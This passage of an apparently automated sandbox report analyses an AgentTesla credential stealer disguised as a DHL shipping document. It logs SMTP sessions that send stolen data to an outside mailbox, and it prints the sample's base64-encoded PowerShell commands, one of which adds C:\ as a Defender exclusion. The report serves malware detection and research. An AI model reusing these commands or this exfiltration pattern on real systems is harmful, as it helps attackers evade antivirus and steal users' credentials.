                                                                                                    Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                    Mar 20, 2023 11:35:18.463351011 CET8.8.8.8192.168.2.30x10dcName error (3)203.215.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                    • api.ipify.org
                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                    Mar 20, 2023 11:34:22.878103971 CET58749698208.91.199.223192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                    Mar 20, 2023 11:34:22.878870964 CET49698587192.168.2.3208.91.199.223EHLO 841675
                                                                                                    Mar 20, 2023 11:34:23.063883066 CET58749698208.91.199.223192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                    250-PIPELINING
                                                                                                    250-SIZE 41648128
                                                                                                    250-VRFY
                                                                                                    250-ETRN
                                                                                                    250-STARTTLS
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-AUTH=PLAIN LOGIN
                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                    250-8BITMIME
                                                                                                    250-DSN
                                                                                                    250 CHUNKING
                                                                                                    Mar 20, 2023 11:34:23.065187931 CET49698587192.168.2.3208.91.199.223AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                    Mar 20, 2023 11:34:23.258714914 CET58749698208.91.199.223192.168.2.3334 UGFzc3dvcmQ6
                                                                                                    Mar 20, 2023 11:34:23.451380968 CET58749698208.91.199.223192.168.2.3235 2.7.0 Authentication successful
                                                                                                    Mar 20, 2023 11:34:23.451690912 CET49698587192.168.2.3208.91.199.223MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:34:23.637947083 CET58749698208.91.199.223192.168.2.3250 2.1.0 Ok
                                                                                                    Mar 20, 2023 11:34:23.638286114 CET49698587192.168.2.3208.91.199.223RCPT TO:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:34:23.848236084 CET58749698208.91.199.223192.168.2.3250 2.1.5 Ok
                                                                                                    Mar 20, 2023 11:34:23.851207018 CET49698587192.168.2.3208.91.199.223DATA
                                                                                                    Mar 20, 2023 11:34:24.037393093 CET58749698208.91.199.223192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                    Mar 20, 2023 11:34:24.041614056 CET49698587192.168.2.3208.91.199.223.
                                                                                                    Mar 20, 2023 11:34:24.360294104 CET58749698208.91.199.223192.168.2.3250 2.0.0 Ok: queued as B89A45008EF
                                                                                                    Mar 20, 2023 11:34:26.123390913 CET49698587192.168.2.3208.91.199.223QUIT
                                                                                                    Mar 20, 2023 11:34:26.309504032 CET58749698208.91.199.223192.168.2.3221 2.0.0 Bye
                                                                                                    Mar 20, 2023 11:34:27.325263977 CET58749699208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                    Mar 20, 2023 11:34:27.325484037 CET49699587192.168.2.3208.91.199.225EHLO 841675
                                                                                                    Mar 20, 2023 11:34:27.510591030 CET58749699208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                    250-PIPELINING
                                                                                                    250-SIZE 41648128
                                                                                                    250-VRFY
                                                                                                    250-ETRN
                                                                                                    250-STARTTLS
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-AUTH=PLAIN LOGIN
                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                    250-8BITMIME
                                                                                                    250-DSN
                                                                                                    250 CHUNKING
                                                                                                    Mar 20, 2023 11:34:27.510909081 CET49699587192.168.2.3208.91.199.225AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                    Mar 20, 2023 11:34:27.698324919 CET58749699208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                                    Mar 20, 2023 11:34:27.889137983 CET58749699208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                                    Mar 20, 2023 11:34:27.889378071 CET49699587192.168.2.3208.91.199.225MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:34:28.078640938 CET58749699208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                                    Mar 20, 2023 11:34:28.078994036 CET49699587192.168.2.3208.91.199.225RCPT TO:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:34:28.289134026 CET58749699208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                                    Mar 20, 2023 11:34:28.289359093 CET49699587192.168.2.3208.91.199.225DATA
                                                                                                    Mar 20, 2023 11:34:28.475245953 CET58749699208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                    Mar 20, 2023 11:34:28.488766909 CET49699587192.168.2.3208.91.199.225.
                                                                                                    Mar 20, 2023 11:34:28.828916073 CET58749699208.91.199.225192.168.2.3250 2.0.0 Ok: queued as 305DC6406B1
                                                                                                    Mar 20, 2023 11:35:11.590221882 CET58749702208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                    Mar 20, 2023 11:35:11.592853069 CET49702587192.168.2.3208.91.198.143EHLO 841675
                                                                                                    Mar 20, 2023 11:35:11.776196957 CET58749702208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                    250-PIPELINING
                                                                                                    250-SIZE 41648128
                                                                                                    250-VRFY
                                                                                                    250-ETRN
                                                                                                    250-STARTTLS
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-AUTH=PLAIN LOGIN
                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                    250-8BITMIME
                                                                                                    250-DSN
                                                                                                    250 CHUNKING
                                                                                                    Mar 20, 2023 11:35:11.776474953 CET49702587192.168.2.3208.91.198.143AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                    Mar 20, 2023 11:35:11.959743023 CET58749703208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                    Mar 20, 2023 11:35:11.959975958 CET49703587192.168.2.3208.91.199.225EHLO 841675
                                                                                                    Mar 20, 2023 11:35:11.962838888 CET58749702208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                                                    Mar 20, 2023 11:35:12.145034075 CET58749703208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                    250-PIPELINING
                                                                                                    250-SIZE 41648128
                                                                                                    250-VRFY
                                                                                                    250-ETRN
                                                                                                    250-STARTTLS
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-AUTH=PLAIN LOGIN
                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                    250-8BITMIME
                                                                                                    250-DSN
                                                                                                    250 CHUNKING
                                                                                                    Mar 20, 2023 11:35:12.145421028 CET49703587192.168.2.3208.91.199.225AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                    Mar 20, 2023 11:35:12.151539087 CET58749702208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                                                    Mar 20, 2023 11:35:12.151762009 CET49702587192.168.2.3208.91.198.143MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:12.333383083 CET58749703208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                                    Mar 20, 2023 11:35:12.336483002 CET58749702208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                                                    Mar 20, 2023 11:35:12.336699009 CET49702587192.168.2.3208.91.198.143RCPT TO:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:12.524157047 CET58749703208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                                    Mar 20, 2023 11:35:12.524444103 CET49703587192.168.2.3208.91.199.225MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:12.550317049 CET58749702208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                                                    Mar 20, 2023 11:35:12.550538063 CET49702587192.168.2.3208.91.198.143DATA
                                                                                                    Mar 20, 2023 11:35:12.711761951 CET58749703208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                                    Mar 20, 2023 11:35:12.712461948 CET49703587192.168.2.3208.91.199.225RCPT TO:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:12.734956026 CET58749702208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                    Mar 20, 2023 11:35:12.738570929 CET49702587192.168.2.3208.91.198.143.
                                                                                                    Mar 20, 2023 11:35:12.924285889 CET58749703208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                                    Mar 20, 2023 11:35:12.925528049 CET49703587192.168.2.3208.91.199.225DATA
                                                                                                    Mar 20, 2023 11:35:13.058434963 CET58749702208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 6FC36B80651
                                                                                                    Mar 20, 2023 11:35:13.112901926 CET58749703208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                    Mar 20, 2023 11:35:13.114183903 CET49703587192.168.2.3208.91.199.225.
                                                                                                    Mar 20, 2023 11:35:13.154227018 CET49702587192.168.2.3208.91.198.143QUIT
                                                                                                    Mar 20, 2023 11:35:13.337726116 CET58749702208.91.198.143192.168.2.3221 2.0.0 Bye
                                                                                                    Mar 20, 2023 11:35:13.430918932 CET58749703208.91.199.225192.168.2.3250 2.0.0 Ok: queued as CB6BF640918
                                                                                                    Mar 20, 2023 11:35:13.490976095 CET49703587192.168.2.3208.91.199.225QUIT
                                                                                                    Mar 20, 2023 11:35:13.676893950 CET58749703208.91.199.225192.168.2.3221 2.0.0 Bye
                                                                                                    Mar 20, 2023 11:35:13.761910915 CET58749704208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                    Mar 20, 2023 11:35:13.762095928 CET49704587192.168.2.3208.91.198.143EHLO 841675
                                                                                                    Mar 20, 2023 11:35:13.944767952 CET58749704208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                    250-PIPELINING
                                                                                                    250-SIZE 41648128
                                                                                                    250-VRFY
                                                                                                    250-ETRN
                                                                                                    250-STARTTLS
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-AUTH=PLAIN LOGIN
                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                    250-8BITMIME
                                                                                                    250-DSN
                                                                                                    250 CHUNKING
                                                                                                    Mar 20, 2023 11:35:13.945008039 CET49704587192.168.2.3208.91.198.143AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                    Mar 20, 2023 11:35:14.130177021 CET58749704208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                                                    Mar 20, 2023 11:35:14.270006895 CET58749705208.91.199.223192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                    Mar 20, 2023 11:35:14.311436892 CET49705587192.168.2.3208.91.199.223EHLO 841675
                                                                                                    Mar 20, 2023 11:35:14.318630934 CET58749704208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                                                    Mar 20, 2023 11:35:14.318866014 CET49704587192.168.2.3208.91.198.143MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:14.496598005 CET58749705208.91.199.223192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                    250-PIPELINING
                                                                                                    250-SIZE 41648128
                                                                                                    250-VRFY
                                                                                                    250-ETRN
                                                                                                    250-STARTTLS
                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                    250-AUTH=PLAIN LOGIN
                                                                                                    250-ENHANCEDSTATUSCODES
                                                                                                    250-8BITMIME
                                                                                                    250-DSN
                                                                                                    250 CHUNKING
                                                                                                    Mar 20, 2023 11:35:14.496830940 CET49705587192.168.2.3208.91.199.223AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                    Mar 20, 2023 11:35:14.502434969 CET58749704208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                                                    Mar 20, 2023 11:35:14.502640009 CET49704587192.168.2.3208.91.198.143RCPT TO:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:14.684770107 CET58749705208.91.199.223192.168.2.3334 UGFzc3dvcmQ6
                                                                                                    Mar 20, 2023 11:35:14.713077068 CET58749704208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                                                    Mar 20, 2023 11:35:14.713208914 CET49704587192.168.2.3208.91.198.143DATA
                                                                                                    Mar 20, 2023 11:35:14.876605034 CET58749705208.91.199.223192.168.2.3235 2.7.0 Authentication successful
                                                                                                    Mar 20, 2023 11:35:14.876791954 CET49705587192.168.2.3208.91.199.223MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:14.896744013 CET58749704208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                    Mar 20, 2023 11:35:14.897586107 CET49704587192.168.2.3208.91.198.143.
                                                                                                    Mar 20, 2023 11:35:15.063580990 CET58749705208.91.199.223192.168.2.3250 2.1.0 Ok
                                                                                                    Mar 20, 2023 11:35:15.063796043 CET49705587192.168.2.3208.91.199.223RCPT TO:<log@thanhphoung-vn.com>
                                                                                                    Mar 20, 2023 11:35:15.202651978 CET58749704208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 97D10B80646
                                                                                                    Mar 20, 2023 11:35:15.275104046 CET58749705208.91.199.223192.168.2.3250 2.1.5 Ok
                                                                                                    Mar 20, 2023 11:35:15.644530058 CET49705587192.168.2.3208.91.199.223DATA
                                                                                                    Mar 20, 2023 11:35:15.831379890 CET58749705208.91.199.223192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                    Mar 20, 2023 11:35:15.832109928 CET49705587192.168.2.3208.91.199.223.
                                                                                                    Mar 20, 2023 11:35:16.150226116 CET58749705208.91.199.223192.168.2.3250 2.0.0 Ok: queued as 2CAA9500950

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:11:33:05
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                    Imagebase:0x19909b90000
                                                                                                    File size:2802176 bytes
                                                                                                    MD5 hash:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low

                                                                                                    Target ID:10
                                                                                                    Start time:11:33:40
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                                                                                                    Imagebase:0x7ff737e40000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    Target ID:11
                                                                                                    Start time:11:33:40
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff745070000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:12
                                                                                                    Start time:11:33:57
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                    Imagebase:0x7ff707bb0000
                                                                                                    File size:273920 bytes
                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:13
                                                                                                    Start time:11:33:57
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff745070000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:14
                                                                                                    Start time:11:33:57
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                    Imagebase:0x7ff737e40000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    Target ID:15
                                                                                                    Start time:11:33:59
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe"
                                                                                                    Imagebase:0xa0000
                                                                                                    File size:171520 bytes
                                                                                                    MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low

                                                                                                    Target ID:17
                                                                                                    Start time:11:34:06
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                                                                                                    Imagebase:0x29405fd0000
                                                                                                    File size:40552 bytes
                                                                                                    MD5 hash:6EE3F830099ADD53C26DF5739B44D608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                    Target ID:18
                                                                                                    Start time:11:34:15
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Users\user\AppData\Local\explorers.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\explorers.exe"
                                                                                                    Imagebase:0x1d807d30000
                                                                                                    File size:2802176 bytes
                                                                                                    MD5 hash:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 38%, ReversingLabs

                                                                                                    Target ID:19
                                                                                                    Start time:11:34:24
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                                                                                                    Imagebase:0x60000
                                                                                                    File size:171520 bytes
                                                                                                    MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                    Target ID:22
                                                                                                    Start time:11:34:32
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Users\user\AppData\Local\explorers.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\explorers.exe"
                                                                                                    Imagebase:0x29791ee0000
                                                                                                    File size:2802176 bytes
                                                                                                    MD5 hash:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                    Target ID:23
                                                                                                    Start time:11:34:42
                                                                                                    Start date:20/03/2023
                                                                                                    Path:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe"
                                                                                                    Imagebase:0x520000
                                                                                                    File size:171520 bytes
                                                                                                    MD5 hash:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                    No disassembly